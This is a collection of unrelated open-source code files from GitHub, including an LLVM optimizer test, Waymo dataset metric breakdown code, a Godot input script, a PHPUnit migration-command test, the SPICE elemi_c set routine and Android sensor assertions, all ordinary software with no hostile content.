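#     %GoogleApi.Admin.Datatransfer_v1.Model.DataTransfersListResponse{
#       dataTransfers: transfers,
#       nextPageToken: next_page_token
#     } = response
#
# where `response` is whatever the corresponding list call returned; a non-nil
# `nextPageToken` indicates that a further page of transfers is available.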
| {
"pile_set_name": "Github"
} |
; RUN: opt < %s -S -passes=ipsccp | FileCheck %s
; RUN: opt < %s -S -ipsccp | FileCheck %s
@_ZL6test1g = internal global i32 42, align 4
define void @_Z7test1f1v() nounwind {
entry:
%tmp = load i32, i32* @_ZL6test1g, align 4
%cmp = icmp eq i32 %tmp, 0
br i1 %cmp, label %if.then, label %if.end
if.then: ; preds = %entry
store i32 0, i32* @_ZL6test1g, align 4
br label %if.end
if.end: ; preds = %if.then, %entry
ret void
}
; CHECK: @_Z7test1f2v()
; CHECK: entry:
; CHECK-NEXT: ret i32 42
define i32 @_Z7test1f2v() nounwind {
entry:
%tmp = load i32, i32* @_ZL6test1g, align 4
ret i32 %tmp
}
| {
"pile_set_name": "Github"
} |
/* Copyright 2019 The Waymo Open Dataset Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#include "waymo_open_dataset/metrics/breakdown_generator.h"
#include <math.h>
#include <glog/logging.h>
#include "absl/memory/memory.h"
#include "absl/strings/str_cat.h"
#include "waymo_open_dataset/label.pb.h"
#include "waymo_open_dataset/protos/breakdown.pb.h"
#include "waymo_open_dataset/protos/metrics.pb.h"
namespace waymo {
namespace open_dataset {
namespace {
double Hypot3(double a, double b, double c) {
return std::sqrt(a * a + b * b + c * c);
}
} // namespace
// This breakdown generator considers everything as one shard.
class BreakdownGeneratorOneShard : public BreakdownGenerator {
public:
~BreakdownGeneratorOneShard() override {}
int Shard(const Object& object) const override { return 0; }
Breakdown::GeneratorId Id() const override { return Breakdown::ONE_SHARD; }
int NumShards() const override { return 1; }
std::string ShardName(int shard) const override { return "ONE_SHARD"; }
};
// This breakdown generator groups every object type except signs into a single shard.
class BreakdownGeneratorAllButSign : public BreakdownGenerator {
public:
~BreakdownGeneratorAllButSign() override {}
int Shard(const Object& object) const override {
if (object.object().type() != Label::TYPE_SIGN) {
return 0;
}
return 1;
}
Breakdown::GeneratorId Id() const override { return Breakdown::ALL_BUT_SIGN; }
int NumShards() const override { return 2; }
std::string ShardName(int shard) const override { return "ALL_BUT_SIGN"; }
};
// This breakdown generator breaks down the objects based on its object type.
class BreakdownGeneratorObjectType : public BreakdownGenerator {
public:
~BreakdownGeneratorObjectType() override {}
int Shard(const Object& object) const override {
// This returns -1 for TYPE_UNKNOWN. -1 indicates that TYPE_UNKNOWN is not
// in any shard.
return static_cast<int>(object.object().type() - 1);
}
Breakdown::GeneratorId Id() const override { return Breakdown::OBJECT_TYPE; }
int NumShards() const override { return static_cast<int>(Label::Type_MAX); }
std::string ShardName(int shard) const override {
return absl::StrCat(Breakdown::GeneratorId_Name(Id()), "_",
Label::Type_Name(static_cast<Label::Type>(shard + 1)));
}
};
// This breakdown generator breaks down the objects based on their center
// distance (w.r.t. SDC if the box is in vehicle frame).
class BreakdownGeneratorRange : public BreakdownGenerator {
public:
~BreakdownGeneratorRange() override {}
int Shard(const Object& object) const override {
double range = Hypot3(object.object().box().center_x(),
object.object().box().center_y(),
object.object().box().center_z());
constexpr float kNearRange = 30.0;
constexpr float kMidRange = 50.0;
const int shard_offset = 3 * (object.object().type() - 1);
if (shard_offset < 0) {
return -1;
}
if (range < kNearRange) {
return 0 + shard_offset;
} else if (range < kMidRange) {
return 1 + shard_offset;
} else {
return 2 + shard_offset;
}
}
Breakdown::GeneratorId Id() const override { return Breakdown::RANGE; }
int NumShards() const override {
return 3 * static_cast<int>(Label::Type_MAX);
}
std::string ShardName(int shard) const override {
const Label::Type object_type = static_cast<Label::Type>(shard / 3 + 1);
CHECK_LE(object_type, Label::Type_MAX) << shard;
CHECK_GE(object_type, 1) << shard;
const std::string prefix = absl::StrCat(Breakdown::GeneratorId_Name(Id()),
"_", Label::Type_Name(object_type));
const int range_shard = shard % 3;
switch (range_shard) {
case 0:
return absl::StrCat(prefix, "_", "[0, 30)");
case 1:
return absl::StrCat(prefix, "_", "[30, 50)");
case 2:
return absl::StrCat(prefix, "_", "[50, +inf)");
default:
LOG(FATAL) << "Code should not reach here.";
}
}
};
// This generator breaks down the results based on the magnitude of
// the velocity vector.
class BreakdownGeneratorVelocity : public BreakdownGenerator {
public:
~BreakdownGeneratorVelocity() override {}
int Shard(const Object& object) const override {
double v_x, v_y;
if (object.object().metadata().has_speed_x() &&
object.object().metadata().has_speed_y()) {
v_x = object.object().metadata().speed_x();
v_y = object.object().metadata().speed_y();
} else {
LOG(WARNING) << "Object does not have speed: " << object.DebugString();
v_x = 0;
v_y = 0;
}
// In meters per second in world coordinates.
const double v_mag = sqrt(v_x * v_x + v_y * v_y);
constexpr float kStationary = 0.2;
constexpr float kSlow = 1.;
constexpr float kMedium = 3.;
constexpr float kFast = 10.;
const int shard_offset = 5 * (object.object().type() - 1);
if (v_mag < kStationary) {
return 0 + shard_offset; // Stationary
} else if (v_mag < kSlow) {
return 1 + shard_offset; // Slow
} else if (v_mag < kMedium) {
return 2 + shard_offset; // Medium
} else if (v_mag < kFast) {
return 3 + shard_offset; // Fast
} else {
return 4 + shard_offset; // Very fast
}
}
std::vector<int> ShardsForMatching(const Object& object) const override {
std::vector<int> shards(5);
for (int i = 0; i < 5; ++i) {
shards[i] = 5 * (object.object().type() - 1) + i;
}
return shards;
}
int NumShards() const override {
return 5 * static_cast<int>(Label::Type_MAX);
}
Breakdown::GeneratorId Id() const override { return Breakdown::VELOCITY; }
std::string ShardName(int shard) const override {
const Label::Type object_type = static_cast<Label::Type>(shard / 5 + 1);
CHECK_LE(object_type, Label::Type_MAX) << shard;
CHECK_GE(object_type, 1) << shard;
const std::string prefix = absl::StrCat(Breakdown::GeneratorId_Name(Id()),
"_", Label::Type_Name(object_type));
const int velocity_shard = shard % 5;
switch (velocity_shard) {
case 0:
return absl::StrCat(prefix, "_", "STATIONARY");
case 1:
return absl::StrCat(prefix, "_", "SLOW");
case 2:
return absl::StrCat(prefix, "_", "MEDIUM");
case 3:
return absl::StrCat(prefix, "_", "FAST");
case 4:
return absl::StrCat(prefix, "_", "VERY_FAST");
default:
LOG(FATAL) << "Code should not reach here.";
}
}
bool IsGroundTruthOnlyBreakdown() const { return true; }
};
std::unique_ptr<BreakdownGenerator> BreakdownGenerator::Create(
Breakdown::GeneratorId id) {
switch (id) {
case Breakdown::OBJECT_TYPE:
return absl::make_unique<BreakdownGeneratorObjectType>();
case Breakdown::ONE_SHARD:
return absl::make_unique<BreakdownGeneratorOneShard>();
case Breakdown::RANGE:
return absl::make_unique<BreakdownGeneratorRange>();
case Breakdown::VELOCITY:
return absl::make_unique<BreakdownGeneratorVelocity>();
case Breakdown::ALL_BUT_SIGN:
return absl::make_unique<BreakdownGeneratorAllButSign>();
default:
LOG(FATAL) << "Unimplemented breakdown generator "
<< Breakdown::GeneratorId_Name(id);
}
}
} // namespace open_dataset
} // namespace waymo
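// Illustrative usage sketch, not part of the library source: callers obtain a
// concrete generator through the factory above and then query its shards, e.g.
//
//   auto generator = waymo::open_dataset::BreakdownGenerator::Create(
//       waymo::open_dataset::Breakdown::RANGE);
//   for (int i = 0; i < generator->NumShards(); ++i) {
//     std::string name = generator->ShardName(i);  // e.g. "RANGE_TYPE_VEHICLE_[0, 30)"
//   }
//
// Shard(object) then maps an individual Object proto to one of these shard
// indices, or to -1 when the object falls outside every shard (as the
// generators above do for TYPE_UNKNOWN).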
| {
"pile_set_name": "Github"
} |
<?php
/**
* Copyright (c) 2015-present, Facebook, Inc. All rights reserved.
*
* You are hereby granted a non-exclusive, worldwide, royalty-free license to
* use, copy, modify, and distribute this software in source code or binary
* form for use in connection with the web services and APIs provided by
* Facebook.
*
* As with any software that integrates with the Facebook platform, your use
* of this software is subject to the Facebook Developer Principles and
* Policies [http://developers.facebook.com/policy/]. This copyright notice
* shall be included in all copies or substantial portions of the software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
* DEALINGS IN THE SOFTWARE.
*/
require __DIR__ . '/vendor/autoload.php';
use FacebookAds\Object\Page;
use FacebookAds\Object\PagePost;
use FacebookAds\Api;
use FacebookAds\Logger\CurlLogger;
$access_token = '<ACCESS_TOKEN>';
$app_secret = '<APP_SECRET>';
$app_id = '<APP_ID>';
$id = '<ID>';
$api = Api::init($app_id, $app_secret, $access_token);
$api->setLogger(new CurlLogger());
$fields = array(
);
$params = array(
);
echo json_encode((new Page($id))->getPosts(
$fields,
$params
)->getResponse()->getContent(), JSON_PRETTY_PRINT); | {
"pile_set_name": "Github"
} |
// This file is part of FreeRCT.
// FreeRCT is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, version 2.
// FreeRCT is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
// See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with FreeRCT. If not, see <http://www.gnu.org/licenses/>.
//
file("shops.rcd") {
INFO {
name: "Baseset shop rides";
uri: "org.freerct/baseset/shops/2";
description: "FreeRCT baseset shops.";
}
// Snack shop.
SHOP {
tile_width: 64;
height: 1;
(se, sw, nw, ne): spritefiles {
x_base: 0; y_base: 0;
file: "../sprites/objects/1x1/template/64_0000{seq(1..4, 1)}.png";
x_offset: -32; y_offset: -33; width: 64; height: 64;
}
flags: bitset(ne_entrance);
cost_item1: 50;
cost_item2: 150;
cost_ownership: 0;
cost_opened: 500;
type_item1: non_salt_food;
type_item2: salt_food;
texts: strings { key: "snack-shop"; }
}
// Ice cream stall.
SHOP {
tile_width: 64;
height: 1;
(se, sw, nw, ne): spritefiles {
x_base: 0; y_base: 0;
file: "../sprites/ride_shops/ice_cream_stall/64_000{seq(1..4,1)}.png";
recolour: "../sprites/ride_shops/ice_cream_stall/64p_000{seq(1..4,1)}.png";
x_offset: -32; y_offset: -97; width: 64; height: 128;
}
recolour {
original: grey;
replace: bitset(pink, orange, green_brown, orange_brown, yellow, light_green, green,
pink_brown, blue, jade_green, purple, red, sea_green);
}
recolour {
original: grey;
replace: bitset(yellow, jade_green, purple, green);
}
flags: bitset(ne_entrance);
cost_item1: 500;
cost_item2: 350;
cost_ownership: 0;
cost_opened: 500;
type_item1: ice_cream;
type_item2: drink;
texts: strings { key: "ice-cream-stall"; }
}
// Toilet.
SHOP {
tile_width: 64;
height: 1;
(se, sw, nw, ne): spritefiles {
x_base: 1; y_base: 0;
file: "../sprites/ride_shops/toilet/64_000{seq(1..4,1)}.png";
recolour: "../sprites/ride_shops/toilet/64p_000{seq(1..4,1)}.png";
x_offset: -33; y_offset: -33; width: 64; height: 64;
}
recolour {
original: grey;
replace: bitset(pink, orange, green_brown, orange_brown, yellow, light_green, green,
pink_brown, blue, jade_green, purple, red, sea_green, grey);
}
flags: bitset(se_entrance);
cost_item1: 100;
cost_item2: 0;
cost_ownership: 0;
cost_opened: 50;
type_item1: toilet;
type_item2: 0;
texts: strings { key: "toilet"; }
}
}
| {
"pile_set_name": "Github"
} |
package com.sample.playground;
public class Main{
public static void main(String[] args) {
Heater heater = new SuperHeater();
        Pump pump = new Thermosiphon(heater);
CoffeeBox box = new CoffeeBox();
        CoffeeMaker maker = new CoffeeMaker(heater, pump, box);
Cup cup = maker.brew(new Cup());
System.out.println("a "+(cup.isEmpty()?"empty":"full") + " cup of "+cup.getCoffee());
}
} | {
"pile_set_name": "Github"
} |
<p q="Just my ¢2" />
| {
"pile_set_name": "Github"
} |
#X-Generator: crowdin.com
# This file defines the default (English) variants of all of the internationalised messages
formhandler.options.title=Form Handler
formhandler.options.desc=This extension allows a user to change the default values used by ZAP Spiders.
formhandler.options.label.description=<html> <body> This Form Handler extension allows for the custom configuration of values used in forms based on field names. Newly created field names must match the field name in the form being processed. The field name inputed is not case sensitive, however the values are and will be reflected in the POST form. If only a field name is provided then an empty string will be used as a value. If a form's field does not match any defined in the extension then it will be passed to the Default Value Generator, which may not provide proper values. </body> </html>
formhandler.options.table.column.enabled=Enabled
formhandler.options.table.column.field=Field Name
formhandler.options.table.column.value=Value
formhandler.options.dialog.field.field.label.name=Name\:
formhandler.options.dialog.field.field.label.value=Value\:
formhandler.options.dialog.field.field.label.enabled=Enabled\:
formhandler.options.dialog.field.warning.name.repeated.title=Duplicated Field Name
formhandler.options.dialog.field.warning.name.repeated.text=A field with the given field name already exists
formhandler.options.dialog.field.add.title=Add A New Field Name And Value
formhandler.options.dialog.field.add.button.confirm=Add
formhandler.options.dialog.field.modify.title=Modify A Field
formhandler.options.dialog.field.modify.button.confirm=Modify
formhandler.options.dialog.field.remove.title=Remove A Field
formhandler.options.dialog.field.remove.text=Are you sure you want to remove the selected field?
formhandler.options.dialog.field.remove.checkbox.label=Do not show this message again
formhandler.options.dialog.field.remove.button.confirm=Remove
formhandler.options.dialog.field.remove.button.cancel=Cancel
| {
"pile_set_name": "Github"
} |
<template name="announcementRejectionPetition">
<h3>Rejection Petition</h3>
<div class="row p-2">
<div class="col-12 col-md-6 my-2">
<h4>Petition Information</h4>
<div class="my-2">
{{#if isVoided}}
<span class="text-nowrap text-warning"><i class="fa fa-warning"></i> 公告已作廢,連署中止</span>
{{else if isPassed}}
<span class="text-nowrap text-success"><i class="fa fa-check"></i> 連署已通過(於 {{formatDateTimeText petition.passedAt}})</span>
{{else if isOverdue}}
<span class="text-nowrap text-danger"><i class="fa fa-times"></i> 已截止,連署未通過</span>
{{else}}
<span class="text-nowrap text-info"><i class="fa fa-pencil"></i> 連署進行中(尚餘 {{formatLongDurationTimeText remainingTime}})</span>
{{/if}}
</div>
<div class="my-2">
Deadline: {{formatDateTimeText petition.dueAt}} <br/>
Threshold: {{threshold}} signers ({{petition.thresholdPercent}}% of the {{petition.activeUserCount}} active players) <br/>
Current number of signers: {{signerCount}}
</div>
{{#if canSign}}
<button class="btn btn-sm btn-warning m-1" data-action="signRejectionPetition">連署支持本次否決</button>
{{/if}}
</div>
<div class="col-12 col-md-6 my-2">
<h4>Supporters of the Rejection</h4>
<ol style="max-height: 300px; overflow-y: auto">
{{#each userId in petition.signers}}
<li>{{> userLink userId }}</li>
{{else}}
<em>Nothing here yet…</em>
{{/each}}
</ol>
</div>
</div>
</template>
| {
"pile_set_name": "Github"
} |
extends Node
# This class contains controls that should always be accessible, like pausing
# the game or toggling the window full-screen.
# The "_" prefix is a convention to indicate that variables are private,
# that is to say, another node or script should not access them.
onready var _pause_menu = $InterfaceLayer/PauseMenu
func _init():
OS.min_window_size = OS.window_size
OS.max_window_size = OS.get_screen_size()
func _notification(what):
if what == NOTIFICATION_WM_QUIT_REQUEST:
# We need to clean up a little bit first to avoid Viewport errors.
if name == "Splitscreen":
$Black/SplitContainer/ViewportContainer1.free()
$Black.queue_free()
func _unhandled_input(event):
if event.is_action_pressed("toggle_fullscreen"):
OS.window_fullscreen = not OS.window_fullscreen
get_tree().set_input_as_handled()
# The GlobalControls node, in the Stage scene, is set to process even
# when the game is paused, so this code keeps running.
# To see that, select GlobalControls, and scroll down to the Pause category
# in the inspector.
elif event.is_action_pressed("toggle_pause"):
var tree = get_tree()
tree.paused = not tree.paused
if tree.paused:
_pause_menu.open()
else:
_pause_menu.close()
get_tree().set_input_as_handled()
elif event.is_action_pressed("splitscreen"):
if name == "Splitscreen":
# We need to clean up a little bit first to avoid Viewport errors.
$Black/SplitContainer/ViewportContainer1.free()
$Black.queue_free()
# warning-ignore:return_value_discarded
get_tree().change_scene("res://src/Main/Game.tscn")
else:
# warning-ignore:return_value_discarded
get_tree().change_scene("res://src/Main/Splitscreen.tscn")
| {
"pile_set_name": "Github"
} |
<?php
/*
* This file is part of the WouterJEloquentBundle package.
*
* (c) 2014 Wouter de Jong
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace WouterJ\EloquentBundle\Command;
use Illuminate\Console\OutputStyle;
use Symfony\Bridge\PhpUnit\SetUpTearDownTrait;
use Symfony\Component\Console\Application;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Helper\HelperSet;
use Symfony\Component\Console\Input\ArrayInput;
use Symfony\Component\Console\Input\InputDefinition;
use Symfony\Component\DependencyInjection\Container;
use Symfony\Component\DependencyInjection\ContainerInterface;
use WouterJ\EloquentBundle\Migrations\Migrator;
use PHPUnit\Framework\TestCase;
use Prophecy\Argument;
/**
* @author Wouter J <[email protected]>
*/
class MigrateCommandTest extends TestCase
{
use SetUpTearDownTrait;
private $migrator;
protected function doSetUp()
{
$this->migrator = $this->prophesize(Migrator::class);
if (method_exists(Migrator::class, 'getNotes')) {
$this->migrator->getNotes()->willReturn([]);
} else {
$this->migrator->setOutput(Argument::type(OutputStyle::class))->willReturn();
}
$this->migrator->paths()->willReturn([]);
}
/** @test */
public function it_asks_for_confirmation_in_prod()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'prod');
$this->migrator->run(Argument::cetera())->shouldNotBeCalled();
TestCommand::create($command)
->answering("no")
->duringExecute()
->outputs('Are you sure you want to execute the migrations in production?');
}
/** @test */
public function it_does_not_ask_for_confirmation_in_dev()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->run(Argument::cetera())->shouldBeCalled();
TestCommand::create($command)
->execute()
->doesNotOutput('Are you sure you want to execute the migrations in production?');
}
/** @test */
public function it_always_continues_when_force_is_passed()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'prod');
$this->migrator->run(Argument::cetera())->shouldBeCalled();
TestCommand::create($command)
->passing('--force')
->duringExecute()
->doesNotOutput('Are you sure you want to execute the migrations in production?');
}
/** @test */
public function it_uses_the_default_migration_path()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->run([__DIR__.'/migrations'], Argument::cetera())->shouldBeCalled();
TestCommand::create($command)->execute();
}
/** @test */
public function it_allows_to_specify_another_path()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->run([getcwd().'/db'], Argument::cetera())->shouldBeCalled();
TestCommand::create($command)->passing('--path', 'db')->duringExecute();
}
/** @test */
public function it_allows_multiple_migration_directories()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->paths()->willReturn(['/somewhere/migrations']);
$this->migrator->run([__DIR__.'/migrations', '/somewhere/migrations'], Argument::cetera())->shouldBeCalled();
TestCommand::create($command)->execute();
}
/** @test */
public function it_allows_batching_migrations_one_by_one()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->run(Argument::any(), ['pretend' => false, 'step' => true])->shouldBeCalled();
TestCommand::create($command)->passing('--step')->duringExecute();
}
/** @test */
public function it_can_pretend_migrations_were_run()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->run(Argument::any(), ['pretend' => true, 'step' => false])->shouldBeCalled();
TestCommand::create($command)->passing('--pretend')->duringExecute();
}
/** @test */
public function it_seeds_after_migrations_when_seed_is_passed()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->run(Argument::cetera())->shouldBeCalled();
$seedCommand = $this->prophesize(Command::class);
$seedCommand->run(Argument::type(ArrayInput::class), Argument::any())->shouldBeCalled();
$app = $this->prophesize(Application::class);
$app->getHelperSet()->willReturn(new HelperSet());
$app->getDefinition()->willReturn(new InputDefinition());
$app->find('eloquent:seed')->willReturn($seedCommand->reveal());
$command->setApplication($app->reveal());
TestCommand::create($command)->passing('--seed')->duringExecute();
}
}
| {
"pile_set_name": "Github"
} |
require 'spec_helper'
describe "c" do
it "1" do
end
it "2" do
end
end
describe "d" do
it "3" do
end
it "4" do
end
end
class LineNumberQuerySubject
end
describe LineNumberQuerySubject do
it "5" do
end
end
describe LineNumberQuerySubject, "described" do
it "6" do
end
end
describe LineNumberQuerySubject, "described", :something => :something_else do
it "7" do
end
end
describe "described", :something => :something_else do
it "8" do
end
end
describe "e" do
it "9" do
end
it "10" do
end
describe "f" do
it "11" do
end
it "12" do
end
end
end
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipaySocialBaseGroupCreateResponse(AlipayResponse):
def __init__(self):
super(AlipaySocialBaseGroupCreateResponse, self).__init__()
self._group_id = None
@property
def group_id(self):
return self._group_id
@group_id.setter
def group_id(self, value):
self._group_id = value
def parse_response_content(self, response_content):
response = super(AlipaySocialBaseGroupCreateResponse, self).parse_response_content(response_content)
if 'group_id' in response:
self.group_id = response['group_id']
| {
"pile_set_name": "Github"
} |
// Imports assumed for a standalone react-base-table docs example; the helper
// module path for generateColumns/generateData is illustrative.
import React from 'react'
import styled from 'styled-components'
import BaseTable, { AutoResizer } from 'react-base-table'
import 'react-base-table/styles.css'
import { generateColumns, generateData } from './utils'
const columns = generateColumns(10)
const data = generateData(columns, 200)
const Container = styled.div`
width: calc(50vw + 220px);
height: 50vh;
`
const Hint = styled.div`
font-size: 16px;
font-weight: 700;
color: #336699;
margin-bottom: 10px;
`
export default () => (
<>
<Hint>Resize your browser and see</Hint>
<Container>
<AutoResizer>
{({ width, height }) => (
<BaseTable
width={width}
height={height}
columns={columns}
data={data}
/>
)}
</AutoResizer>
</Container>
</>
)
| {
"pile_set_name": "Github"
} |
/*
-Procedure elemi_c ( Element of an integer set )
-Abstract
Determine whether an item is an element of an integer set.
-Disclaimer
THIS SOFTWARE AND ANY RELATED MATERIALS WERE CREATED BY THE
CALIFORNIA INSTITUTE OF TECHNOLOGY (CALTECH) UNDER A U.S.
GOVERNMENT CONTRACT WITH THE NATIONAL AERONAUTICS AND SPACE
ADMINISTRATION (NASA). THE SOFTWARE IS TECHNOLOGY AND SOFTWARE
PUBLICLY AVAILABLE UNDER U.S. EXPORT LAWS AND IS PROVIDED "AS-IS"
TO THE RECIPIENT WITHOUT WARRANTY OF ANY KIND, INCLUDING ANY
WARRANTIES OF PERFORMANCE OR MERCHANTABILITY OR FITNESS FOR A
PARTICULAR USE OR PURPOSE (AS SET FORTH IN UNITED STATES UCC
SECTIONS 2312-2313) OR FOR ANY PURPOSE WHATSOEVER, FOR THE
SOFTWARE AND RELATED MATERIALS, HOWEVER USED.
IN NO EVENT SHALL CALTECH, ITS JET PROPULSION LABORATORY, OR NASA
BE LIABLE FOR ANY DAMAGES AND/OR COSTS, INCLUDING, BUT NOT
LIMITED TO, INCIDENTAL OR CONSEQUENTIAL DAMAGES OF ANY KIND,
INCLUDING ECONOMIC DAMAGE OR INJURY TO PROPERTY AND LOST PROFITS,
REGARDLESS OF WHETHER CALTECH, JPL, OR NASA BE ADVISED, HAVE
REASON TO KNOW, OR, IN FACT, SHALL KNOW OF THE POSSIBILITY.
RECIPIENT BEARS ALL RISK RELATING TO QUALITY AND PERFORMANCE OF
THE SOFTWARE AND ANY RELATED MATERIALS, AND AGREES TO INDEMNIFY
CALTECH AND NASA FOR ALL THIRD-PARTY CLAIMS RESULTING FROM THE
ACTIONS OF RECIPIENT IN THE USE OF THE SOFTWARE.
-Required_Reading
SETS
-Keywords
CELLS, SETS
*/
#include "SpiceUsr.h"
#include "SpiceZfc.h"
#include "SpiceZmc.h"
SpiceBoolean elemi_c ( SpiceInt item,
SpiceCell * set )
/*
-Brief_I/O
VARIABLE I/O DESCRIPTION
-------- --- --------------------------------------------------
item I Item to be tested.
set I Set to be tested.
The function returns SPICETRUE if item is an element of set.
-Detailed_Input
item is an item which may or may not be an element of
the input set.
set is a CSPICE set. set must be declared as an integer
SpiceCell.
-Detailed_Output
The function returns SPICETRUE if item is a member of the set,
and returns SPICEFALSE otherwise.
-Parameters
None.
-Exceptions
1) If the input set argument does not qualify as a CSPICE set,
the error SPICE(NOTASET) will be signaled. CSPICE sets have
their data elements sorted in increasing order and contain
no duplicate data elements.
2) If the input set does not have integer data type, the error
SPICE(TYPEMISMATCH) will be signaled.
-Files
None.
-Particulars
This routine uses a binary search to check for the presence in the set
of the specified item.
-Examples
Let set contain the elements
{ -1, 0, 1, 3, 5 }
Then the following expressions have the value SPICETRUE
elemi_c ( -1, &set )
elemi_c ( 0, &set )
elemi_c ( 3, &set )
and the following expressions have the value SPICEFALSE
elemi_c ( -2, &set )
elemi_c ( 2, &set )
elemi_c ( 6, &set )
-Restrictions
None.
-Literature_References
None.
-Author_and_Institution
N.J. Bachman (JPL)
C.A. Curzon (JPL)
H.A. Neilan (JPL)
W.L. Taber (JPL)
I.M. Underwood (JPL)
-Version
-CSPICE Version 1.0.0, 07-AUG-2002 (NJB) (CAC) (HAN) (WLT) (IMU)
-Index_Entries
element of an integer set
-&
*/
{
/*
Use discovery check-in.
Make sure we're working with an integer cell.
*/
CELLTYPECHK_VAL ( CHK_DISCOVER, "elemi_c", SPICE_INT, set, SPICEFALSE );
/*
Make sure the input cell is a set.
*/
CELLISSETCHK_VAL ( CHK_DISCOVER, "elemi_c", set, SPICEFALSE );
/*
Initialize the set if necessary.
*/
CELLINIT ( set );
/*
The routine bsrchi_c returns the index of the item in the set,
or -1 if the item is not present.
*/
return ( ( SpiceBoolean )
( bsrchi_c ( item, set->card, set->data ) != -1 ) );
}
| {
"pile_set_name": "Github"
} |
#include "widgets/grid_item.h"
#include "gtest/gtest.h"
TEST(GridItem, cast) {
widget_t* w = grid_item_create(NULL, 10, 20, 30, 40);
ASSERT_EQ(w, grid_item_cast(w));
widget_destroy(w);
}
| {
"pile_set_name": "Github"
} |
// Copyright 2013 Square, Inc.
package org.assertj.android.api.hardware;
import android.annotation.TargetApi;
import android.hardware.Sensor;
import org.assertj.core.api.AbstractAssert;
import static android.hardware.Sensor.TYPE_ACCELEROMETER;
import static android.hardware.Sensor.TYPE_ALL;
import static android.hardware.Sensor.TYPE_AMBIENT_TEMPERATURE;
import static android.hardware.Sensor.TYPE_GAME_ROTATION_VECTOR;
import static android.hardware.Sensor.TYPE_GEOMAGNETIC_ROTATION_VECTOR;
import static android.hardware.Sensor.TYPE_GRAVITY;
import static android.hardware.Sensor.TYPE_GYROSCOPE;
import static android.hardware.Sensor.TYPE_GYROSCOPE_UNCALIBRATED;
import static android.hardware.Sensor.TYPE_HEART_RATE;
import static android.hardware.Sensor.TYPE_LIGHT;
import static android.hardware.Sensor.TYPE_LINEAR_ACCELERATION;
import static android.hardware.Sensor.TYPE_MAGNETIC_FIELD;
import static android.hardware.Sensor.TYPE_MAGNETIC_FIELD_UNCALIBRATED;
import static android.hardware.Sensor.TYPE_ORIENTATION;
import static android.hardware.Sensor.TYPE_PRESSURE;
import static android.hardware.Sensor.TYPE_PROXIMITY;
import static android.hardware.Sensor.TYPE_RELATIVE_HUMIDITY;
import static android.hardware.Sensor.TYPE_ROTATION_VECTOR;
import static android.hardware.Sensor.TYPE_SIGNIFICANT_MOTION;
import static android.hardware.Sensor.TYPE_STEP_COUNTER;
import static android.hardware.Sensor.TYPE_STEP_DETECTOR;
import static android.hardware.Sensor.TYPE_TEMPERATURE;
import static android.os.Build.VERSION_CODES.GINGERBREAD;
import static android.os.Build.VERSION_CODES.KITKAT;
import static org.assertj.android.internal.BitmaskUtils.buildNamedValueString;
import static org.assertj.core.api.Assertions.assertThat;
/** Assertions for {@link Sensor} instances. */
public class SensorAssert extends AbstractAssert<SensorAssert, Sensor> {
public SensorAssert(Sensor actual) {
super(actual, SensorAssert.class);
}
public SensorAssert hasMaximumRange(float range) {
isNotNull();
float actualRange = actual.getMaximumRange();
assertThat(actualRange) //
.overridingErrorMessage("Expected maximum range <%s> but was <%s>.", range, actualRange) //
.isEqualTo(range);
return this;
}
@TargetApi(GINGERBREAD)
public SensorAssert hasMinDelay(int delay) {
isNotNull();
int actualDelay = actual.getMinDelay();
assertThat(actualDelay) //
.overridingErrorMessage("Expected minimum delay <%s> but was <%s>.", delay, actualDelay) //
.isEqualTo(delay);
return this;
}
public SensorAssert hasName(String name) {
isNotNull();
String actualName = actual.getName();
assertThat(actualName) //
.overridingErrorMessage("Expected name <%s> but was <%s>.", name, actualName) //
.isEqualTo(name);
return this;
}
public SensorAssert hasPower(float power) {
isNotNull();
float actualPower = actual.getPower();
assertThat(actualPower) //
.overridingErrorMessage("Expected power <%s> but was <%s>.", power, actualPower) //
.isEqualTo(power);
return this;
}
public SensorAssert hasResolution(float resolution) {
isNotNull();
float actualResolution = actual.getResolution();
assertThat(actualResolution) //
.overridingErrorMessage("Expected resolution <%s> but was <%s>.", resolution,
actualResolution) //
.isEqualTo(resolution);
return this;
}
public SensorAssert hasType(@SensorType int type) {
isNotNull();
int actualType = actual.getType();
//noinspection ResourceType
assertThat(actualType) //
